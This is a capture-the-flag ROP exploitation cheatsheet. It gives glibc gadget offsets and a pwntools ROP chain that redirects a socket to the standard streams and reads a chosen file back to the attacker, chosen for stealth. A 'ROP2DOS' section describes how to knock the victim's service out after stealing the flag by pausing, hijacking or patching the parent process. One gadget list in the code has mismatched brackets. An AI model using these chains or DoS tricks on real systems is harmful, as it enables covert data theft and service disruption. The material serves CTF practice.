# ROP exploitation cheatsheet

This cheatsheet is not here for learning how to ROP. This is will assume you know how to ROP and you're autonomous for doing so.

Moreover, a lot of things in this cheatsheet is missing


## Return-oriented PROGRAMING

To be able to program, you have to chain syscalls and functions by reuse results of the first ones as arguments of the others.

### x86_64 Linux

* Results of functions located in `RAX`.
* Arguments are given in the order in this list (first to last):
    1. `RDI`;
    2. `RSI`;
    3. `RDX`;
    4. `R10`;
    5. `R8`;
    6. `R9`;
    7. Then, on the stack, from last to first.


There are some interesting gadgets in the glibc:

1. To put EAX into EDI (so, only for ID objects, as file descriptors):
    ```asm
        push rax ; pop rbx ; ret  # Offest 0x1750eb in libc6_2.35-0ubuntu3.1_amd64
        add edi, ebx ; ret  # Offset 0x1b3f16 in libc6_2.35-0ubuntu3.1_amd64
    ```
    So, you only have to set RDI to 0 before.

    Example:

    The socket FD is into RDI. You want to send the content of a file into your socket WITHOUT calling an exec-family syscall to be more stealthy. Here is your ROP chain:
    ```python
        ADD_EDI_EAX = [
            leak_data['libc_base'] + 0x00000000001750eb,  # push rax ; pop rbx ; ret
            leak_data['libc_base'] + 0x00000000001b3f16,  # add edi, ebx ; ret
        }

        rop = ROP(libc, base=BASE_ROP)

        # Inspired from https://shell-storm.org/shellcode/files/shellcode-881.html
        rop.call('dup')
        # Now EAX = our socket FD

        rop.rdi = 0
        [rop.raw(x) for x in ADD_EDI_EAX]
        rop.rsi = 0
        rop.call('dup2')  # dup2(socket_FD, 0)
        rop.call('dup2', [0, 1])
        rop.call('dup2', [0, 2])

        # Now stdin, stdout & stderr are our socket :)
        # Let's open the file and read&send its content!

        ADDR_BUFFER_FLAG = BASE_ROP - (SIZE_FLAG)
        rop.call('open', [FILE_TO_DUMP])
        rop.rdi = 0
        [rop.raw(x) for x in ADD_EDI_EAX]
        rop.rsi = 3
        rop.call('dup2')  # dup2(file_FD, 3)
        # Now, the fd of the file to dump is 3

        rop.call('read', [3, ADDR_BUFFER_FLAG, SIZE_FLAG])
        rop.call('write', [1, ADDR_BUFFER_FLAG, SIZE_FLAG])
        rop.call('exit', [0])
    ```




## ROP2DOS

In attack-defense CTF, you might be interested by a ROP giving the flag, then leading to a DOS (to make the impacted team loosing points and harrast blue guys). To do so, we may have many strategies.


### Pause the parent

Usecase: a binary bind the port and fork at every incoming requests.

Idea: `ptrace(PTRACE_ATTACH, ppid, 0, 0)` at the end of the ROP chain.

Requirements:

* Having the `CAP_SYS_PTRACE` capability
* OR having each of these requirements:
    - Not being an SUID/SGID binary
    - Not already be traced
    - Not having a user ID change.

Forensic/Debugging artifacts: The main process will have the "Tracee / stoped" state instead of the "sleeping" one. The child process will be in a zombie state (thus the CERT will be able to retreive the ROP chain).

How to fix the DOS: kill the main process and re-run it.


### Re-open the socket

Usecase: a binary bind the port and fork at every incoming requests.

Idea: use the `SO_REUSEPORT` socket option to make the child binding the same port and answering shit (or, worst, only leaking the flag for the attacker IP or header). The answer maybe distributed in a round-rubin, thus X% of requests which is handled by the real process. If the parent is paused, this X% requests will have no answer, else, they will have the expected answer.

Requirements:

* Having the `CAP_SYS_PTRACE` capability
* OR having each of these requirements:
    - Not being an SUID/SGID binary
    - Not already be traced
    - Not having a user ID change.

Forensic/Debugging artifacts: The main process will have the "Tracee / stoped" state instead of the "sleeping" one. A child process will always be up and will never die.

How to fix the DOS: kill the main process and its childs and re-run it.


### Pause and modify the parent

Usecase: a binary bind the port and fork at every incoming requests.

Idea: Make a loop of `wait()` to avoid any zombie child and not accepting any new requests. Or patching the parent bytecode for patching the vuln and accept to give the flag only for the attacker IP.

Requirements:

* Having the `CAP_SYS_PTRACE` capability
* OR having each of these requirements:
    - Not being an SUID/SGID binary
    - Not already be traced
    - Not having a user ID change.

Forensic/Debugging artifacts: Nothing special, the mapped opcodes will not the one of the disk, but this requires to dump the process before.

How to fix the DOS: kill the main process and its childs and re-run it.
